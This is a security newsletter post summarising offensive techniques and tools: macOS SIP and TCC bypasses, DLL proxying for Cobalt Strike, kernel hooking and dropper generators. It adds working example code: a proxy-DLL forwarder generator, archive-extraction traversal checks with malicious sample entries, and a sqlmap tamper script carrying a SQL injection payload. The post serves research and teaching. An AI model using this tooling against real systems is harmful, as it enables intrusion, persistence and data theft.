Last Week in Security (LWiS) - 2021-11-01

DLL proxying with artifact kit (@joevest), lateral movement 101 (@_RastaMouse), Windows kernel driver hooking (@cerbersec), macOS XAR arbitrary file write (@buffaloverflow), malapi.io launch (@mrd0x), protobuf in sqlmap (@APTortellini), and more!

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-10-26 to 2021-11-01.

News

Techniques

  • Neat SIP bypass for macOS. system_installd spawns a zsh shell while holding an entitlement that bypasses SIP, and zsh reads /etc/zshenv on startup, so Microsoft found that commands placed in /etc/zshenv run with that same entitlement. How many more ways are there? Full Microsoft post: Shrootless.
  • Create a proxy DLL with artifact kit. DLL proxying is a great way to persist and in some cases elevate privileges. This post shows how to use the official artifact kit to turn a Cobalt Strike DLL into a "function proxy."
  • Lateral Movement 101. The old favorites are here, but perhaps there are details you've missed? Rasta also dropped new C#-related projects today: D/Invoke Baguette.
  • Kernel Karnage – Part 2 (Back to Basics). EDRs are moving into the kernel, and drivers can provide great local privilege escalation opportunities. This post explores hooking other drivers' (i.e. the EDR's) functions. Want to start debugging the Windows kernel? This 101 post was released yesterday.
  • Technical Advisory – Apple XAR – Arbitrary File Write (CVE-2021-30833). These types of archive extraction arbitrary file writes can be great for phishing and even local privilege escalation (if a program accepts an archive and extracts it at a higher privilege level). Fixed in 12.0.1.
  • CVE-2021-30920 - CVE-2021-1784 strikes back - TCC bypass via mounting. macOS 12 has a regression that lets a user mount over ~/Library, and thus over the TCC database. Yikes! Fixed in 12.0.1.
  • Tortellini in Brodobuf. Serializing data just adds a layer of unpacking, not security. This post goes from manual decode and exploitation proof to writing a sqlmap tamper script to automate it.
  • Understanding SysCalls Manipulation. Direct syscalls have been around for a while, but this technique has the stub jmp back into NTDLL.DLL's memory space, so the kernel returns into ntdll rather than into program memory it shouldn't be returning to (i.e. the location of your direct syscall stub), which is the part that looks suspicious. Sneaky! PoC here.
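
Since the artifact kit post above stops at "turn the DLL into a function proxy", here is the piece a practitioner ends up writing by hand: a script that reads the export table of the DLL you are impersonating and emits one MSVC forwarder pragma per export, so your proxy keeps the real DLL working. This is an added example written for this post, not artifact kit or Cobalt Strike code. The export-table parser is real PE parsing; the input DLL is a constructed minimal PE32+ image (build_sample_dll) so the script runs offline, and the names version.dll and version_orig (the renamed original) are illustrative.

```python
"""Generate MSVC forwarder directives for a proxy DLL from the export table
of the DLL being proxied. Constructed example, not artifact kit code."""
import struct

def parse_exports(data):
    """Walk a PE image's export directory.
    Returns (dll_name, [(ordinal, name_or_None, forwarder_or_None), ...])."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                               # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_off = opt + (112 if magic == 0x20B else 96)   # DataDirectory[0] = exports
    exp_rva, exp_size = struct.unpack_from("<II", data, dir_off)
    sections = []
    for i in range(num_sections):
        sec = opt + opt_size + 40 * i
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, sec + 8)
        sections.append((va, max(vsize, raw_size), raw_ptr))

    def off(rva):  # RVA -> file offset via the section table
        for va, size, raw_ptr in sections:
            if va <= rva < va + size:
                return rva - va + raw_ptr
        raise ValueError(f"RVA {rva:#x} is not backed by any section")

    def cstr(rva):
        o = off(rva)
        return data[o:data.index(b"\0", o)].decode()

    (_, _, _, _, name_rva, base, n_funcs, n_names, aof, aon,
     aono) = struct.unpack_from("<IIHHIIIIIII", data, off(exp_rva))
    names = {}
    for i in range(n_names):  # name table runs parallel to the ordinal table
        idx = struct.unpack_from("<H", data, off(aono) + 2 * i)[0]
        names[idx] = cstr(struct.unpack_from("<I", data, off(aon) + 4 * i)[0])
    exports = []
    for idx in range(n_funcs):
        func_rva = struct.unpack_from("<I", data, off(aof) + 4 * idx)[0]
        if func_rva == 0:
            continue  # gap in the ordinal range
        # An address that lands inside the export directory is a forwarder string.
        fwd = cstr(func_rva) if exp_rva <= func_rva < exp_rva + exp_size else None
        exports.append((base + idx, names.get(idx), fwd))
    return cstr(name_rva), exports

def forwarder_pragmas(real_module, exports):
    """One '#pragma comment(linker, "/export:...")' per export, forwarding to
    real_module (the renamed original, e.g. version_orig for version_orig.dll).
    Ordinals are preserved so callers that import by ordinal still work."""
    lines = []
    for ordinal, name, fwd in exports:
        target = fwd or (f"{real_module}.{name}" if name else f"{real_module}.#{ordinal}")
        if name:
            lines.append(f'#pragma comment(linker, "/export:{name}={target},@{ordinal}")')
        else:  # ordinal-only export: keep the ordinal and export it NONAME
            lines.append(f'#pragma comment(linker, "/export:ord{ordinal}={target},@{ordinal},NONAME")')
    return lines

def build_sample_dll(dll_name, export_names):
    """Constructed minimal PE32+ image containing only an export table, used
    here in place of a real DLL so the example runs offline."""
    n, base_rva, raw_ptr = len(export_names), 0x1000, 0x200
    aof, aon, aono = 40, 40 + 4 * n, 40 + 8 * n
    strings, name_rvas = bytearray(), []
    dll_name_rva = base_rva + 40 + 10 * n             # strings follow the three tables
    strings += dll_name.encode() + b"\0"
    for nm in export_names:
        name_rvas.append(dll_name_rva + len(strings))
        strings += nm.encode() + b"\0"
    body = bytearray(struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, dll_name_rva, 1, n, n,
                                 base_rva + aof, base_rva + aon, base_rva + aono))
    body += b"".join(struct.pack("<I", 0x2000 + 0x10 * i) for i in range(n))  # fake code RVAs
    body += b"".join(struct.pack("<I", rva) for rva in name_rvas)
    body += b"".join(struct.pack("<H", i) for i in range(n))
    body += strings
    raw_size = (len(body) + 0x1FF) & ~0x1FF
    hdr = bytearray(b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)) + b"PE\0\0"
    hdr += struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)  # x64 DLL, one section
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                     # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                      # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112, base_rva, len(body))    # export DataDirectory
    hdr += opt
    hdr += struct.pack("<8sIIIIIIHHI", b".edata", len(body), base_rva, raw_size,
                       raw_ptr, 0, 0, 0, 0, 0x40000040)
    hdr += b"\0" * (raw_ptr - len(hdr))
    return bytes(hdr + body + b"\0" * (raw_size - len(body)))

if __name__ == "__main__":
    # Real use: data = open(r"C:\Windows\System32\version.dll", "rb").read()
    data = build_sample_dll("version.dll", ["GetFileVersionInfoA", "VerQueryValueA"])
    dll_name, exports = parse_exports(data)
    print("\n".join(forwarder_pragmas("version_orig", exports)))
```

Paste the printed pragmas into the proxy DLL's source, ship the original next to it under the real_module name, and every import resolves through your DLL to the real one. Two things the generator handles that a quick dumpbin copy-paste misses: exports that are already forwarders (it forwards to the final target rather than back through the original), and ordinal-only exports, which must keep their ordinal or the caller breaks.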
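
The XAR advisory above is one instance of a whole bug class, so here are the containment checks an extractor needs before it writes a member, as an added example (my code, not XAR's and not from the advisory). A lexical check catches "../" traversal; a second check against the real filesystem catches a symlink, whether extracted earlier or already present under the destination, that would redirect the write; and symlink members are themselves required to point inside the destination. The archive listing is constructed, and the zshenv and LaunchAgents file names are just illustrative targets.

```python
"""Containment checks an archive extractor needs before writing a member.
Added example; not XAR code and not material from the NCC advisory."""
import os
import tempfile

class UnsafeMember(ValueError):
    pass

def safe_target(dest_root, member_name):
    """Absolute path a member may be written to, or raise UnsafeMember."""
    root = os.path.realpath(dest_root)
    if os.path.isabs(member_name):
        raise UnsafeMember(f"absolute path: {member_name!r}")
    target = os.path.normpath(os.path.join(root, member_name))
    if os.path.commonpath([root, target]) != root:        # lexical '..' escape
        raise UnsafeMember(f"traversal: {member_name!r}")
    # Re-check against the real filesystem: a symlink already under root
    # (from an earlier member or pre-existing) could redirect this write.
    parent = os.path.realpath(os.path.dirname(target))
    final = os.path.join(parent, os.path.basename(target))
    if os.path.commonpath([root, parent]) != root or os.path.islink(final):
        raise UnsafeMember(f"resolves outside root or through a link: {member_name!r}")
    return final

def safe_link_target(dest_root, link_path, link_target):
    """Reject symlink members whose target leaves dest_root."""
    root = os.path.realpath(dest_root)
    if os.path.isabs(link_target):
        raise UnsafeMember(f"absolute symlink target: {link_target!r}")
    resolved = os.path.normpath(os.path.join(os.path.dirname(link_path), link_target))
    if os.path.commonpath([root, resolved]) != root:
        raise UnsafeMember(f"symlink escapes root: {link_target!r}")
    return link_target

# Constructed archive listing: (member name, kind, file bytes or link target).
SAMPLE_ARCHIVE = [
    ("pkg/README", "file", b"harmless"),
    ("pkg/../../../../etc/zshenv", "file", b"evil"),    # plain traversal
    ("pkg/current", "symlink", "."),                     # legitimate, stays inside
    ("pkg/current/notes.txt", "file", b"via in-tree link"),
    ("pkg/out", "symlink", "../../.."),                  # link pointing above root
    ("pkg/out/Library/LaunchAgents/x.plist", "file", b"evil"),
]

def extract(entries, dest_root):
    """Extract entries under dest_root; returns (written names, rejected pairs)."""
    written, rejected = [], []
    for name, kind, payload in entries:
        try:
            path = safe_target(dest_root, name)
            if kind == "symlink":
                safe_link_target(dest_root, path, payload)
        except UnsafeMember as err:
            rejected.append((name, str(err)))
            continue
        os.makedirs(os.path.dirname(path), exist_ok=True)
        if kind == "symlink":
            os.symlink(payload, path)
        else:
            with open(path, "wb") as fh:
                fh.write(payload)
        written.append(name)
    return written, rejected

def demo():
    """Run the sample archive through extract(); then show that a symlink
    already sitting under dest cannot redirect a later write either."""
    with tempfile.TemporaryDirectory() as dest, tempfile.TemporaryDirectory() as outside:
        written, rejected = extract(SAMPLE_ARCHIVE, dest)
        os.symlink(outside, os.path.join(dest, "pkg", "preexisting"))
        try:
            safe_target(dest, "pkg/preexisting/.zshenv")
            redirected = True
        except UnsafeMember:
            redirected = False
        return written, [name for name, _ in rejected], redirected

if __name__ == "__main__":
    print(demo())
```

Note what happens to the last sample entry: once the "pkg/out" link is refused, "pkg/out/Library/LaunchAgents/x.plist" is just a regular file inside the destination, which is exactly why the link check has to happen at the link, not at the file written through it. When the extractor runs at a higher privilege than whoever supplied the archive, every one of these checks is the difference between a file and an LPE.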

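To make the "serializing adds unpacking, not security" point concrete, here is the shape of a protobuf tamper script, written for this post rather than taken from the Tortellini write-up: hand-rolled wire-format encode/decode (varints and length-delimited fields are all you need for strings and ints), a schema-less decoder for the manual-decode step, and a sqlmap tamper() that wraps each payload in the message the target expects. The message layout (field 1 = user id, field 2 = the injectable search string, base64 in the body) and the USER_ID constant are assumptions for the example.

```python
"""Protobuf wire-format helpers and a sqlmap-style tamper() that wraps the
injection payload in a serialised message. Added example; the message layout
(field 1 = user id, field 2 = search string, base64 body) is assumed."""
import base64

def encode_varint(n):
    out = bytearray()
    while True:
        byte, n = n & 0x7F, n >> 7
        if n == 0:
            out.append(byte)
            return bytes(out)
        out.append(byte | 0x80)          # continuation bit, more bytes follow

def decode_varint(buf, pos=0):
    """Returns (value, position just after the varint)."""
    result, shift = 0, 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7

def encode_field(field_no, value):
    """Tag is (field_no << 3) | wire_type: 0 = varint, 2 = length-delimited."""
    if isinstance(value, int):
        return encode_varint((field_no << 3) | 0) + encode_varint(value)
    data = value.encode() if isinstance(value, str) else bytes(value)
    return encode_varint((field_no << 3) | 2) + encode_varint(len(data)) + data

def decode_message(buf):
    """Schema-less decode: list of (field_no, wire_type, value)."""
    pos, fields = 0, []
    while pos < len(buf):
        tag, pos = decode_varint(buf, pos)
        field_no, wire_type = tag >> 3, tag & 7
        if wire_type == 0:
            value, pos = decode_varint(buf, pos)
        elif wire_type == 2:
            length, pos = decode_varint(buf, pos)
            value, pos = bytes(buf[pos:pos + length]), pos + length
        else:
            raise ValueError(f"wire type {wire_type} not handled in this example")
        fields.append((field_no, wire_type, value))
    return fields

USER_ID = 1337  # assumed fixed field sent alongside the injectable one

def build_request(search):
    """Body the (assumed) target expects: base64 of {1: user_id, 2: search}."""
    return base64.b64encode(encode_field(1, USER_ID) + encode_field(2, search)).decode()

def decode_request(body):
    """The manual-decode step: base64 body back to raw fields."""
    return decode_message(base64.b64decode(body))

# --- sqlmap tamper script interface (dependencies/__priority__ per sqlmap's convention)
__priority__ = 0

def dependencies():
    pass

def tamper(payload, **kwargs):
    """sqlmap calls this with each SQL payload; the returned string replaces
    the injection marker in the request."""
    if not payload:
        return payload
    return build_request(payload)

if __name__ == "__main__":
    body = tamper("x' OR 1=1-- -")
    print(body)
    print(decode_request(body))
```

Usage with sqlmap is the usual marker trick: put `*` where the body goes (`--data='*'`) so the tamper output becomes the whole body, and point `--tamper` at the script file. Once the target's message layout is known, everything sqlmap does from there is unchanged, which is the whole point of the Tortellini post.
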
Tools and Exploits

  • quiet-riot is an enumeration tool for scalable, unauthenticated validation of AWS principals, including AWS Account IDs, root e-mail addresses, users, and roles. Check out the blog post here.
  • DInvoke is a library to dynamically invoke arbitrary unmanaged code from managed code without P/Invoke. Fork of D/Invoke by TheWover, but refactored to .NET Standard 2.0 and split into individual NuGet packages.
  • Metsubushi is a Go project to generate droppers with encrypted payloads automatically.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • melting-cobalt scans for Cobalt Strike teamservers, grabs beacons that allow staging, and stores their configs. No reason to leave staging enabled these days...
  • dockerized-android is a container-based framework to enable the integration of mobile components in security training platforms.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.